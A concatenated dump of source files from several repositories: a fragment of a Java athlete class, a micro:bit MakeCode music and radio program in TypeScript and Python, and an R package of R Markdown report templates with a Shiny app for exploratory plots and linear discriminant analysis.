    public abstract Double calcularValorPontosPorJogo();

    /**
     * @param idJogador player identifier
     * @param nome player name
     * @param idade age in years
     * @param posicao position code (interpreted by the subclass)
     * @param salario salary used as the valuation base
     */
    public Atleta(Integer idJogador, String nome, Integer idade, String posicao, Double salario) {
        this.idJogador = idJogador;
        this.nome = nome;
        this.idade = idade;
        this.posicao = posicao;
        this.salario = salario;
    }

    public Integer getIdJogador() {
        return idJogador;
    }

    public void setIdJogador(Integer idJogador) {
        this.idJogador = idJogador;
    }

    public String getNome() {
        return nome;
    }

    public void setNome(String nome) {
        this.nome = nome;
    }

    public Integer getIdade() {
        return idade;
    }

    public void setIdade(Integer idade) {
        this.idade = idade;
    }

    public String getPosicao() {
        return posicao;
    }

    public void setPosicao(String posicao) {
        this.posicao = posicao;
    }

    public Double getSalario() {
        return salario;
    }

    public void setSalario(Double salario) {
        this.salario = salario;
    }
}
| a496626530320a6c39a81f726676e42db075907f | [
"Java"
] | 3 | Java | joaojacintho/bandtec-continuada | 01fead0fe5ab241ce4495cc6fca6703c11cc8591 | e9ef84dc092c5eccf7b56d0f2fc5f128f229a7f3 |
refs/heads/master | <repo_name>otajisan/my-first-microbit<file_sep>/main.ts
// Show any number received over the micro:bit radio on the LED matrix.
radio.onReceivedNumber(function on_received_number(receivedNumber: number) {
    basic.showNumber(receivedNumber)
})
// Startup sequence: countdown, then play the opening melody line.
function on_first() {
    count_down()
    sing(opening())
}
// Display 3-2-1 followed by "Go!".
function count_down() {
    for (let num of [3, 2, 1]) {
        basic.showNumber(num)
    }
    basic.showString("Go!")
}
// Draw a smiley face on the 5x5 LED matrix.
function smile() {
    basic.showAnimation(`
        . . . . .
        . # . # .
        . . . . .
        # . . . #
        . # # # .
        `)
}
// Button A: play one of the two songs, chosen at random.
input.onButtonPressed(Button.A, function on_button_pressed_a() {
    sing_random_song()
})
// Scroll any string received over the radio.
radio.onReceivedString(function on_received_string(receivedString: string) {
    basic.showString(receivedString)
})
// First line of "Twinkle Twinkle Little Star", used as the opening melody.
function opening(): string {
    return kirakiraboshi()[0]
}
// "Twinkle Twinkle Little Star" (kirakira boshi) as MakeCode melody lines.
function kirakiraboshi(): string[] {
    return ["C - C - G - G - A - A - G - - -", "F - F - E - E - D - D - C - - -", "G - G - F - F - E - E - D - - -", "G - G - F - F - E - E - D - - -", "C - C - G - G - A - A - G - - -", "F - F - E - E - D - D - C - - -"]
}
// "Kaeru no Uta" (the frog song) as MakeCode melody lines.
function kaerunouta(): string[] {
    return ["C - D - E - F - E - D - C - - -", "E - F - G - A - G - F - E - - -", "C - - - C - - - C - - - C - - -", "C C D D E E F F E - D - C - - -"]
}
// Pick one of the two songs with a fair coin flip.
function get_random_song(): string[] {
    if (Math.randomBoolean()) {
        return kaerunouta()
    }
    return kirakiraboshi()
}
// Play a melody string at 240 bpm, showing a note icon while it plays.
function sing(song: string) {
    basic.showIcon(IconNames.EigthNote)
    let bpm = 240
    music.playMelody(song, bpm)
}
// Play a randomly chosen song, with its lines joined into one melody string.
function sing_random_song() {
    sing(get_random_song().join(" "))
}
// Program entry: join radio group 1, broadcast the song, run the intro,
// then blink a smiley forever.
radio.setGroup(1)
radio.sendString(kirakiraboshi().join(" "))
on_first()
basic.forever(function on_forever() {
    smile()
    basic.clearScreen()
})
<file_sep>/main.py
# MakeCode Python port of the TypeScript program (same behaviour).
# Show any number received over the micro:bit radio on the LED matrix.
def on_received_number(receivedNumber):
    basic.show_number(receivedNumber)
radio.on_received_number(on_received_number)
# Startup sequence: countdown, then play the opening melody line.
def on_first():
    count_down()
    sing(opening())
# Display 3-2-1 followed by "Go!".
def count_down():
    for num in [3, 2, 1]:
        basic.show_number(num)
    basic.show_string("Go!")
# Draw a smiley face on the 5x5 LED matrix.
def smile():
    basic.show_animation("""
        . . . . .
        . # . # .
        . . . . .
        # . . . #
        . # # # .
        """)
# Button A: play one of the two songs, chosen at random.
def on_button_pressed_a():
    sing_random_song()
input.on_button_pressed(Button.A, on_button_pressed_a)
# Scroll any string received over the radio.
def on_received_string(receivedString):
    basic.show_string(receivedString)
radio.on_received_string(on_received_string)
# First line of "Twinkle Twinkle Little Star", used as the opening melody.
def opening():
    return kirakiraboshi()[0]
# "Twinkle Twinkle Little Star" (kirakira boshi) as MakeCode melody lines.
def kirakiraboshi():
    return [
        "C - C - G - G - A - A - G - - -",
        "F - F - E - E - D - D - C - - -",
        "G - G - F - F - E - E - D - - -",
        "G - G - F - F - E - E - D - - -",
        "C - C - G - G - A - A - G - - -",
        "F - F - E - E - D - D - C - - -"
    ]
# "Kaeru no Uta" (the frog song) as MakeCode melody lines.
def kaerunouta():
    return [
        "C - D - E - F - E - D - C - - -",
        "E - F - G - A - G - F - E - - -",
        "C - - - C - - - C - - - C - - -",
        "C C D D E E F F E - D - C - - -"
    ]
# Pick one of the two songs with a fair coin flip.
def get_random_song():
    if Math.random_boolean():
        return kaerunouta()
    return kirakiraboshi()
# Play a melody string at 240 bpm, showing a note icon while it plays.
def sing(song):
    basic.show_icon(IconNames.EIGTH_NOTE)
    bpm = 240
    music.play_melody(song, bpm)
# Play a randomly chosen song joined into one melody string.
# NOTE(review): list.join(" ") is MakeCode-generated pseudo-Python, not
# standard Python (" ".join(list)) — valid only in the MakeCode runtime.
def sing_random_song():
    sing(get_random_song().join(" "))
# Program entry: join radio group 1, broadcast the song, run the intro,
# then blink a smiley forever.
radio.set_group(1)
radio.send_string(kirakiraboshi().join(" "))
on_first()
def on_forever():
    smile()
    basic.clear_screen()
basic.forever(on_forever)
"Python",
"TypeScript"
] | 2 | TypeScript | otajisan/my-first-microbit | 8b379746e3dce0a9917b0966991e0a9e224a4d57 | ccd0cb8af657a0164fe3927764948e7c00d3ea3b |
refs/heads/master | <file_sep>---
title: "Analysis of the `r params$datasetName` dataset"
author: "<NAME>, <NAME>, OpenAnalytics"
date: "`r format(Sys.time(), '%d %B %Y')`"
output:
bookdown::html_document2:
css: css/custom.css
toc: true
toc_depth: 4
number_sections: true
toc_float:
collapsed: true
---
<!---
Copy this template in your working directory (where you want to run the report).
You can make use of the function getPathStartTemplate().
This template can be used as a starting document for any new dataset
-->
```{r copyStartTemplate, echo = FALSE, eval = FALSE}
# copy start template to working directory
library(exampleRTemplatePackage)
file.copy(from = getPathStartTemplate(), to = "./")
```
```{r runDocument, echo = FALSE, eval = FALSE}
## This chunk contains code to render the document.
rm(list = ls())
detach('package:exampleRTemplatePackage', unload = TRUE);library(exampleReportingPackage)
system.time(rmarkdown::render("startTemplate.Rmd"))
```
```{r optionsChunk, echo = FALSE, message = FALSE, warning=FALSE}
## Chunk with options for knitr. This chunk should not be modified.
knitr::opts_chunk$set(
eval = TRUE,
echo = FALSE,
message = FALSE,
cache = FALSE,
warning = FALSE,
error = FALSE,
comment = "#",
tidy = FALSE,
collapse = TRUE,
results = "asis",
root.dir = params$outputPath
)
knitr::opts_knit$set(
root.dir = getwd())
options(warn = 1, width = 200)
```
```{r requiredLibraries}
library(bookdown)
```
<!-- Loading the package with the child templates and functions for the creation of this report. -->
```{r libraries}
library(knitr)
# load R template package
library(exampleRTemplatePackage)
```
```{r inputParameters-data}
dataset <- params$dataset
variables <- params$variables
covariate <- params$covariate
boxPlot <- params$boxPlot
histogram <- params$histogram
pairwiseComparison <- params$pairwiseComparison
typePlot <- params$typePlot
includeLda <- params$includeLda
outputPath <- params$outputPath
formatOutput <- params$formatOutput
```
<!-- call/run child template with the analysis, contained in the `exampleReportingPackage` package-->
```{r runAnalysis, child = getPathTemplate("exampleTemplate_child.Rmd")}
```
<file_sep><!---
INPUT PARAMETERS
-->
```{r histogramChild-inputParameters-{{iH}}}
histogramVariableFull <- histogramVariablesFull[{{iHST}}]
histogramVariableDescription <- histogramVariablesDescription[{{iHST}}]
# color palette
library(oaColors)
colorPaletteH <- oaPalette(
numColors = nlevels(dataset[, covariate]), 1)
names(colorPaletteH) <- levels(dataset[, covariate])
message("Creation of histogram of ", histogramVariableDescription, ".")
```
## Histogram of `r histogramVariableDescription`
```{r histogramChild-figCaption-{{iH}}}
figCaption <- paste("Histogram of", histogramVariableDescription)
```
Figure \@ref(`r paste0("fig:histogramChild-plots-", {{iHST}})`) shows the
histogram of the variable `r histogramVariableDescription` for each
`r covariate` class.
```{r histogramChild-plots-{{iH}}, fig.cap = figCaption}
suppressPackageStartupMessages(library(ggplot2))
h <- ggplot(dataset, aes_string(x = histogramVariableFull, fill = covariate)) +
scale_color_manual(colorPaletteH) +
geom_histogram(alpha = 0.5) + geom_density(alpha = 0.8) +
theme_bw()
suppressPackageStartupMessages(library(plotly))
ggplotly(h)
```
```{r testDifferenceBetweenDistributions-{{iH}}}
  # test for a difference between the group distributions (Kruskal-Wallis)
resKruskalTest <- kruskal.test(x = dataset[, histogramVariableFull], g = dataset[, covariate])
resKruskalTestPVal <- resKruskalTest$p.value
```
The distribution of `r histogramVariableFull` is `r ifelse(resKruskalTest$p.value < 0.05, "different", "not different")`
in at least one of the `r covariate` groups (_Kruskal-Wallis_ test: p-value =
`r format(resKruskalTest$p.value, scientific = TRUE, digits = 2)`
`r ifelse(resKruskalTest$p.value < 0.05, "<", ">=")` 0.05).<file_sep># Executed before ui.R and server.R
###############################################################################
library(exampleRTemplatePackage)
outputDir <- "."
source("./modules/shiny-modules.R")<file_sep>shinyUI(
fluidPage(
shinyjs::useShinyjs(),
includeCSS("./www/custom.css"),
fluidRow(column(1, img(src = "logo.png", float = "top", height = "60px", hspace = "50px")),
column(6, headerPanel("Example of R template package"))),
tags$br(),
fluidRow(
column(5,
helpText(paste("This application demonstrates the use of a R template package to",
"create semi-automate template analysis report.")),
h2("Data"),
helpText(paste("Please select dataset for the demonstration.")),
selectInput("dataset", "Dataset of interest",
choices = c("iris", 'warpbreaks',
'Pima Indians Diabetes', 'US states'
)
),
h2("Input parameters"),
helpText(paste("Please select input parameters for the choice of visualizations.",
"These parameters will be passed to the implemented template.")),
h3("Boxplot of variables"),
checkboxInput(inputId = "boxPlot",
"Visualize variable distribution with a boxplot",
value = TRUE, width = '100%'),
h3("Histogram of each variable by covariate"),
checkboxInput(inputId = "histogram",
"Visualize the distribution of each variable by covariate",
value = TRUE, width = '100%'),
conditionalPanel("output.moreThanOneVariable",
h3("Pairwise comparison plot"),
checkboxInput(inputId = "pairwiseComparison",
"Visualize pairs scatterplot of the variables",
value = TRUE, width = '100%'),
selectInput("typePlot", "Library used for the visualization",
c("static with base R" = "baseR", 'static with ggplot2' = "ggplot2",
'interactive with rbokeh' = "rbokeh", 'interactive with plotly' = "plotly"))
),
conditionalPanel("output.moreThanTwoVariables",
h3("Linear discriminant analysis"),
checkboxInput(inputId = "includeLda", "Include linear discriminant analysis", value = TRUE)
),
h2("Reporting"),
# call module
runReportShinyUI(id = "analysis", labelReport = "analysis")
)))
)<file_sep>
```{r ldaChild-inputParameters}
message(". Section linear discriminant analysis")
if(!exists("covariateLda", where = environment()))
stop("'The covariate used for the linear discriminant analysis should",
" be specified via the 'covariateLda' parameter'.")
```
The linear discriminant analysis of the dataset with the
`r paste0("'", covariateLda, "'")` response (equation: \@ref(eq:ldaDataset)) is
run with the `lda` function of the `MASS` package:
```{r ldaChild-printEquation}
cat("\\begin{equation}\n",
covariateLda, "\\sim",
paste(colnames(dataset)[colnames(dataset) != covariateLda], collapse = " + "),
"\n(\\#eq:ldaDataset)\n",
"\\end{equation}\n"
)
```
```{r ldaChild-runLda}
message("Run lda")
library(MASS)
resLda <- lda(as.formula(paste(covariateLda, "~ .")), data = dataset)
```
```{r ldaChild-plotLda, fig.width = 7, fig.height = 7}
message("Plot lda")
# color palette for the covariate
colorPalette <- oaPalette(
numColors = nlevels(dataset[, covariateLda]))
names(colorPalette) <- levels(dataset[, covariateLda])
# change color from hcl to hex
colorPaletteHex <- do.call(rgb, as.list(as.data.frame(t(col2rgb(colorPalette)/255))))
# code html list in R (don't forget line break before the list!) with colors
if(formatOutput == "html")
cat("Following Figure shows the lda biplot, with the following palette:\n\n")
cat(
paste(paste0("* <font color='", colorPaletteHex,"'>", names(colorPalette), "</font>"),
collapse = "\n")
)
# scatterplot of lda results
plot(resLda, dimen = 2,
col = colorPalette[dataset[, covariateLda]], cex = 0.4,
main = "Linear discriminant analysis"
)
```
```{r ldaChild-printDetailsLda}
message("Print details of lda results")
# extract details of the results of lda
resLdaDetails <- sapply(names(resLda), function(x) resLda[[x]], simplify = FALSE)
resLdaDetails <- resLdaDetails[sapply(resLdaDetails, length) > 0]
# use pander table to print details (can use list as input)
library(pander)
# create drop-down box with details of the results
switch(formatOutput,
'html' =
tmp <- collapseInHtml(
input = pander(resLdaDetails),
id = "resultsLda",
titleButton = "Details on the results of the linear discriminant analysis",
type = "text", color = "#0e1e29", borderColor = "#0e1e29"),
'pdf' = pander(resLdaDetails)
)
```<file_sep>---
title: "Start template, master file"
author: "<NAME>, <NAME>, OpenAnalytics"
date: "`r format(Sys.time(), '%d %B %Y')`"
output:
bookdown::html_document2:
css: css/custom.css
toc: true
toc_depth: 4
number_sections: true
toc_float:
collapsed: true
---
<!---
Copy this template in your working directory (where you want to run the report).
You can make use of the function getPathStartTemplate().
This template can be used as a starting document for any new dataset
-->
```{r copyStartTemplate, echo = FALSE, eval = FALSE}
# copy start template to working directory
library(exampleRTemplatePackage)
file.copy(from = getPathStartTemplate(), to = "./")
```
```{r runDocument, echo = FALSE, eval = FALSE}
## This chunk contains code to render the document.
rm(list = ls())
detach('package:exampleRTemplatePackage', unload = TRUE);library(exampleReportingPackage)
system.time(rmarkdown::render("startTemplate.Rmd"))
```
```{r inputOutputPath, echo = FALSE}
# output path (can differs than working directory)
outputPath <- file.path(getwd(), "output/")
if (!file.exists(outputPath)) dir.create(outputPath, recursive = TRUE)
# When working on a windows computer it should be "/Users/..." instead of "C:/Users/..."
if(.Platform$OS.type == "windows") outputPath <- paste0("/", paste(unlist(strsplit(outputPath, split = "/"))[-1], collapse = "/"),"/")
```
```{r optionsChunk, echo = FALSE, message = FALSE, warning=FALSE}
## Chunk with options for knitr. This chunk should not be modified.
knitr::opts_chunk$set(
eval = TRUE,
echo = FALSE,
message = FALSE,
cache = FALSE,
warning = FALSE,
error = FALSE,
comment = "#",
tidy = FALSE,
collapse = TRUE,
results = "asis",
root.dir = outputPath)
knitr::opts_knit$set(
root.dir = getwd())
options(warn = 1, width = 200)
```
```{r requiredLibraries}
library(bookdown)
```
<!-- Loading the package with the child templates and functions for the creation of this report. -->
```{r libraries}
library(knitr)
# load R template package
library(exampleRTemplatePackage)
```
```{r inputParameters-data}
# load dataset
data(iris)
## input parameters - data
# 'dataset': data.frame/matrix with variables
dataset <- iris
# 'variables': column names of 'dataset' with numeric variables
variables <- grep("Species", colnames(iris),
invert = TRUE, value = TRUE)
# 'covariate': factor variable with subset of data
covariate <- "Species"
```
```{r inputParameters-analysis}
## input parameters for boxplot
# 'boxplot': boolean, should the 'variables' be represented with a boxplot versus the 'covariate'?
boxPlot <- TRUE
# 'boxplotColorVariables': vector with color for each boxplot
# with names corresponding to the names of the 'variables'
# (for color specific of each variable)
boxPlotColorVariables <- c("red", "magenta", "blue", "cyan")
names(boxPlotColorVariables) <- c("Sepal.Length", "Sepal.Width",
"Petal.Length", "Petal.Width")
## input parameter for pairwise comparison plot of each pair of variables
# 'pairwiseComparison': boolean, should each pair of 'variables'
# be represented in paired scatterplot
# (with the function 'pairwiseComparison' of the package)
pairwiseComparison <- TRUE
# 'pairwiseComparisonPlotColorVariable': column name of the dataset used to
# color the points in the scatterplot
pairwiseComparisonPlotColorVariable <- "Species"
# 'typePlot': type of the plot, either 'baseR', 'ggplot2', 'rbokeh', or 'plotly'
typePlot <- "plotly"
## input parameters for a linear discriminant analysis of the data
# 'includeLda': boolean, should a linear discriminant analysis be executed on the data?
includeLda <- TRUE
# 'covariateLda': column name of 'dataset' with groups for the discriminant analysis
covariateLda <- covariate
# 'dimensionsLda': numeric, number of linear discriminants to be usred for the plot
dimensionsLda <- 4
```
<!-- call/run child template with the analysis, contained in the `exampleReportingPackage` package-->
```{r runAnalysis, child = getPathTemplate("exampleTemplate_child.Rmd")}
```
<file_sep># This bit of code gets the path of the start template contained in the 'exampleRTemplatePackage'
# and copy it to the working directory
###############################################################################
# Install package
# Note: if you want to make use of the templates you might need some or all of the 'suggests' packages as well
# (depending on the requests)
# Load package with template
library(exampleRTemplatePackage)
# Copy child template from the installed package to the working directory
file.copy(from = getPathStartTemplate(), to = "./")
# You can now modify the 'startTemplate' file directly, adapting the
# input parameters (and the YAML header) to your dataset
<file_sep><!---
INPUT PARAMETERS
-->
```{r boxPlotsChild-inputParameters-{{iBP}}}
boxPlotVariable <- boxPlotVariables[{{iBP}}]
dataBoxPlot <- dataset[dataset[,covariate] == boxPlotVariable, ]
colorBP <- if(exists("boxPlotColorVariables", where = environment())) boxPlotColorVariables else NULL
message("Creation of box plot of ", boxPlotVariable, ".")
```
## Boxplot of `r boxPlotVariable`
```{r boxPlotChild-figCaption-{{iBP}}}
figCaption <- paste0("Box plot for ", tolower(covariate), ": ", boxPlotVariable)
```
Figure \@ref(`r paste0("fig:boxPlotChild-plots-", {{iBP}})`) compares the
distribution of `r toString(variables)` for `r boxPlotVariable`.
```{r boxPlotChild-plots-{{iBP}}, fig.cap = figCaption}
datasetBP <- dataBoxPlot[, variables, drop = FALSE]
datasetBP$ID <- 1:nrow(datasetBP)
suppressPackageStartupMessages(library(reshape2))
mm = melt(datasetBP, id = "ID")
suppressPackageStartupMessages(library(plotly))
p <- plot_ly(mm, y = ~value, color = ~variable, type = "box", colors = colorBP)
p
```<file_sep>
```{r parametersChildDocument}
library(pander)
## required input parameters
message("Check required input parameters")
# check if all require input parameters are specified
variablesToSpecify <- c("dataset", "variables", "covariate")
inputParametersNotSpecified <- !sapply(variablesToSpecify, exists, where = environment())
if(any(inputParametersNotSpecified))
stop("Please specify the ", toString(variablesToSpecify[inputParametersNotSpecified]), ".")
```
```{r parametersChildDocumentDefaults}
## optional input parameters, set to default value if not specified
if(!exists("boxPlot", where = environment())) boxPlot <- TRUE
if(!exists("histogram", where = environment())) histogram <- TRUE
if(!exists("pairwiseComparison", where = environment())){
if(length(variables) > 1 & exists("covariate", where = environment())){
pairwiseComparison <- TRUE
}else pairwiseComparison <- FALSE
}
if(length(variables) <= 1) pairwiseComparison <- FALSE
if(pairwiseComparison & !exists("pairwiseComparisonPlotColorVariable", where = environment()))
pairwiseComparisonPlotColorVariable <- covariate
if(!exists("includeLda", where = environment())){
if(length(variables) > 2 & exists("covariate", where = environment())){
includeLda <- TRUE
}else includeLda <- FALSE
}
if(length(variables) <= 2) includeLda <- FALSE
if(includeLda & !exists("covariateLda", where = environment())) covariateLda <- covariate
if(!exists("typePlot", where = environment())) typePlot <- "rbokeh"
if(!exists("formatOutput", where = environment())) formatOutput <- "html"
```
```{r compareOutputpathWithWd}
message("Compare output path with working directory")
outputPathCompare <- paste0(getwd(), "/")
if(.Platform$OS.type == "windows") outputPathCompare <- paste0("/", paste(unlist(strsplit(outputPathCompare, split = "/"))[-1], collapse = "/"),"/")
# differentWd <- outputPath != outputPathCompare
#
# if(differentWd) warning(paste0('The specified "outputPath" (i.e. ', outputPath,') is NOT the same \n as the current working directory (i.e. ', outputPathCompare, '). \n',
# 'The graphs and objects will be saved in the "outputPath" location, \n while the report (and the css file) will be saved in the working directory.'))
```
```{r copyCustomCssFile}
message("Copy css file from package")
# message("output path css: ", paste0(getwd(), "/css"))
if(!exists("personalCss", where = environment())) personalCss <- FALSE
if(!personalCss){
cssFile <- getPathFile("custom.css")
outputPathCss <- paste0(getwd(), "/css")
if(.Platform$OS.type == "windows") outputPathCss <- paste0("/", paste(unlist(strsplit(outputPathCss, split = "/"))[-1], collapse = "/"))
if (!file.exists(outputPathCss)) dir.create(outputPathCss, recursive = TRUE)
outputPathCss <- paste0(outputPathCss, "/")
copyFile <- file.copy(from = cssFile, to = outputPathCss, overwrite = TRUE)
}
message(". Section Material and methods")
```
# Material and methods
## Data
The dataset contains `r nrow(dataset)` samples, `r length(variables)` variables:
`r toString(variables)`
and `r length(covariate)` covariate: `r toString(covariate)`.
```{r detailsOfData}
message(".. Data table")
switch(formatOutput,
'html' = {
library(DT)
datatable(dataset,
options = list(
searching = TRUE,
pageLength = 10
# lengthMenu = c(5, 10, 15, 20)
),
rownames = FALSE
)
},
'pdf' = pander(dataset)
)
```
## Summary of the data
Tables below show overall statistics of `r toString(variables)` for:
* the entire dataset
* the variables for each subset of the `r paste0("'", covariate, "'")`
covariate:
`r paste(paste(" +", levels(dataset[,covariate])), collapse = "\n")`
<!-- Tables with pander in for loop. -->
```{r summaryDataPander}
message(".. Summary of the data via pander")
library(pander)
panderOptions('knitr.auto.asis', FALSE)
for(subData in c("all", levels(dataset[,covariate]))){
if(subData == "all"){
cat("\n### All", tolower(covariate), "\n\n")
pander(summary(dataset[,variables]), caption = paste("Summary for all", tolower(covariate)))
}else{
cat("\n###", simpleCap(subData, onlyFirst = TRUE), "\n\n")
pander(summary(dataset[dataset[,covariate] == subData,variables]),
caption = paste0("Summary for ", subData))
}
cat("\n\n")
}
```
`r if(boxPlot) "# Box plot"`
```{r boxPlots-viaLoopOnChildDocumentInteger, eval = boxPlot}
## example of call of child documents within a loop
message(". Section box plot - via child documents using integer")
locationBoxPlotDocument <- getPathTemplate("exampleTemplate_boxPlot.Rmd")
# initialize the output
outputBoxPlotDocument <- NULL
# variable for which to print box plots
boxPlotVariables <- unique(dataset[,covariate])
# loop across pairs of variables, with integer
for(iBP in seq(length(boxPlotVariables))){
# extract the code of the child, with variables within {{}} replaced
outputBoxPlotDocument <- c(outputBoxPlotDocument,
knit_expand(locationBoxPlotDocument))
}
# run the document
cat(knit(text = unlist(paste(outputBoxPlotDocument, collapse = '\n')), quiet=TRUE))
```
`r if(histogram) "# Histogram"`
`r if(histogram) paste("Note: we removed the '.' from the character since otherwise bookdown does not return figure numbers.")`
<!-- Via child documents using a character. -->
```{r histogram-viaLoopOnChildDocumentCharacter, eval = histogram}
## example of call of child documents within a loop
message(". Section histogram - via child documents using character")
locationHistogramDocument <- getPathTemplate("exampleTemplate_histogram.Rmd")
# initialize the output
outputHistogramDocument <- NULL
# variable for which to print histogram
histogramVariable <- gsub("\\.", " ", tolower(variables))
histogramVariablesFull <- variables
histogramVariablesDescription <- histogramVariable
names(histogramVariablesFull) <- names(histogramVariablesDescription) <- histogramVariable
# loop across pairs of variables, with character
for(iH in histogramVariable){
iHST <- paste0("'", iH, "'")
# extract the code of the child, with variables within {{}} replaced
outputHistogramDocument <- c(outputHistogramDocument,
knit_expand(locationHistogramDocument))
}
# run the document
cat(knit(text = unlist(paste(outputHistogramDocument, collapse = '\n')), quiet=TRUE))
```
`r if(pairwiseComparison) "# Pairwise comparison plot"`
`r if(pairwiseComparison)
"## Summary\nFollowing Figure shows the correlation matrix of all variables contained in the data."`
```{r pairwiseComparison-summary, eval = pairwiseComparison}
library(corrplot)
inputCorrplot <- cor(dataset[, variables])
corrplot.mixed(inputCorrplot, order = "hclust")
```
```{r pairwiseComparisonPlots-viaLoopOnChildDocumentInteger, eval = pairwiseComparison}
message(". Section pairwise comparison - via loop on plots")
message(".. Pairwise comparison plots via child documents using an integer")
## path child template
locationPairwiseComparisonPlotDocument <-
getPathTemplate("exampleTemplate_pairwiseComparison.Rmd")
## input parameters
# matrix with different pairs of variables (columns)
pairwiseComparisonVariables <- combn(variables, 2)
# description of the comparison as text
pairwiseComparisonVariablesDescriptions <- apply(pairwiseComparisonVariables, 2,
paste, collapse = " and ")
## run the document
outputPairwiseComparisonPlotDocument <- NULL # initialize the output
# loop across pairs of variables, with character
for(iPC in 1:ncol(pairwiseComparisonVariables)){
# extract the code of the child, with variables within {{}} replaced
outputPairwiseComparisonPlotDocument <- c(outputPairwiseComparisonPlotDocument,
knit_expand(locationPairwiseComparisonPlotDocument))
}
# run the document
cat(knit(text = unlist(
paste(outputPairwiseComparisonPlotDocument, collapse = '\n')),
quiet = TRUE)
)
```
`r if(includeLda) "# Linear discriminant analysis"`
`r if(includeLda) knit_child(getPathTemplate("exampleTemplate_lda.Rmd"))`
# Appendix
## Used software
```{r usedSoftware}
printSessionInfoMarkdown()
```
_Template developed by <NAME> and <NAME>, Open Analytics._
<file_sep>#' UI module function to include buttons to run/retrieve qPCR report from Shiny app
#' @param id module identifier
#' @param labelReport string, label for the report
#' @return tagList with:
#' \itemize{
#' \item{action button to run report execution}
#' \item{progress message output}
#' \item{download button to retrieve report}
#' }
#' @author <NAME>
runReportShinyUI <- function(id, labelReport){
ns <- NS(id)
tagList(
actionButton(
ns("createReport"),
label = paste("Create", labelReport, "report"),
style = "background-color: #32a6d3"
),
uiOutput(ns("progressMessageReport")),
br(),
conditionalPanel(
condition = paste0("output['", ns("reportCreated"), "'] == true "),
downloadButton(
ns("getReport"),
label = paste("Get", labelReport, "Report"),
style = "background-color: #e6e6e6"
)
)
)
}
#' server module function to include buttons to run/retrieve qPCR report from Shiny app
#' @param input shiny input object
#' @param output shiny output object
#' @param session shiny session object
#' @param labelReport string with label for the report
#' @param outputDir reactive expression with output directory string
#' @param params reactive expression with list of parameters filled in the interface
#' @param dataFiles reactive expression with \code{fileInput} for data files
#' @param sampleAnnotationFile reactive expression with \code{fileInput} for sample annotation file
#' @param outputSubdirectoryToKeep string with subdirectory to keep
#' for cleaning of \code{outputDir}
#' @return no returned value
#' @author <NAME>
runReportShiny <- function(input, output, session,
labelReport,
outputDir, paramsUI, dataset, variables, covariate
){
outputReportName <- reactive(
paste0(outputDir, "analysisDataset-", gsub(" ", "", paramsUI()$dataset), ".",
"html")
)
output$reportCreated <- reactive(FALSE)
observeEvent(input$createReport, {
print(paste("report button clicked: output directory is", outputDir))
# in case previous execution
output$reportCreated <- reactive(FALSE)
outputOptions(output, "reportCreated", suspendWhenHidden = FALSE)
# use if statement for error because validate doesn't work within observeEvent
if(!is.null(dataset())){
params <- paramsUI()
params$datasetName <- params$dataset
# output directory used in report
params$dataset <- dataset()
params$variables <- variables()
params$covariate <- covariate()
params$outputPath <- outputDir
params$formatOutput <- "html"
# # clean results previous execution
# filesAlreadyPresent <- list.files(outputDir(), full.names = TRUE)
# if(!is.null(outputSubdirectoryToKeep))
# filesAlreadyPresent <- filesAlreadyPresent[
# filesAlreadyPresent != file.path(outputDir(), outputSubdirectoryToKeep)
# ]
# unlink(filesAlreadyPresent, recursive = TRUE)
# create output directory
# dir.create(params$dataDir, recursive = TRUE)
# for testing/debugging
save(params, file = file.path(outputDir, "params.RData"))
# print(outputDir())
nameReport <- "masterTemplate.Rmd"
pathQC <- exampleRTemplatePackage::getPathTemplate(nameReport)
withProgress(
message = paste("Creation of the", labelReport, "report in progress"),
detail = "This may take a few minutes", {
pathOutput <- file.path(outputDir, nameReport)
# copy start template
file.copy(from = pathQC, to = pathOutput, overwrite = TRUE)
# outputOptions <- list(
# 'toc' = TRUE,
# 'toc_depth' = 4,
# 'number_sections' = TRUE#,
## 'always_allow_html' = TRUE
# )
#
## if(paramsUI()$formatOutput == "html")
# outputOptions <- c(outputOptions,
# list('css' = "css/custom.css",
# 'toc_float' = TRUE)
# )
# run template
library(bookdown)
potentialErrorMessage <- try(
res <- rmarkdown::render(
input = pathOutput,
output_file = outputReportName(),
params = params,
envir = new.env(),
# output_format = switch(
# paramsUI()$formatOutput,
# 'html' = "html_document2",
# 'pdf' = "pdf_document2"
# ),
# output_options = outputOptions
)
, silent = TRUE)
}
)
if(inherits(potentialErrorMessage, "try-error")){
output$progressMessageReport <- renderUI(
div(strong(paste("The", labelReport, "report didn't run:", potentialErrorMessage)),
style = "color:red"))
}else{
output$progressMessageReport <- renderUI(div(
paste("Creation of the", labelReport, "report is successful."),
style = "color:green"))
output$reportCreated <- reactive(TRUE)
outputOptions(output, "reportCreated", suspendWhenHidden = FALSE)
}
}else{
output$progressMessageReport <- renderUI(
div("Data file(s) should be provided", style = "color:red"))
}
})
reportResults <- reactive({
file.path(outputDir, outputReportName())
})
observe({
output$getReport <- downloadHandler(
filename = function() outputReportName(),
content = function(file){
file.copy(from = reportResults(), to = file)
}#, contentType = "application/pdf"
)
})
}<file_sep>---
title: "Example 4: State data (pairwise comparison and linear discriminant analysis)"
author: "<NAME>, <NAME>, OpenAnalytics"
date: "`r format(Sys.time(), '%d %B %Y')`"
output:
bookdown::html_document2:
css: css/custom.css
toc: true
toc_depth: 4
number_sections: true
toc_float:
collapsed: true
---
<!---
Copy this template in your working directory (where you want to run the report).
You can make use of the function getPathStartTemplate().
This template can be used as a starting document for any new dataset
-->
```{r runDocument, echo = FALSE, eval = FALSE}
## This chunk contains code to render the document.
rm(list = ls())
detach('package:exampleRTemplatePackage', unload = TRUE);library(exampleRTemplatePackage)
system.time(rmarkdown::render("example4.Rmd"))
```
```{r inputOutputPath, echo = FALSE}
# working directory as output path
# outputPath <- file.path(getwd(), "")
# different folder as output path
outputPath <- file.path(getwd(), "output/")
if (!file.exists(outputPath)) dir.create(outputPath, recursive = TRUE)
# When working on a windows computer it should be "/Users/..." instead of "C:/Users/..."
if(.Platform$OS.type == "windows") outputPath <- paste0("/", paste(unlist(strsplit(outputPath, split = "/"))[-1], collapse = "/"),"/")
```
```{r optionsChunk, echo = FALSE, message = FALSE, warning=FALSE}
## Chunk with options for knitr. This chunk should not be modified.
knitr::opts_chunk$set(
eval = TRUE,
echo = FALSE,
message = FALSE,
cache = FALSE,
warning = FALSE,
error = FALSE,
comment = "#",
tidy = FALSE,
collapse = TRUE,
results = "asis",
root.dir = outputPath)
knitr::opts_knit$set(
root.dir = getwd())
options(warn = 1, width = 200)
```
```{r requiredLibraries}
library(bookdown)
```
<!-- Loading the package with the child templates and functions for the creation of this report. -->
```{r libraries}
library(knitr)
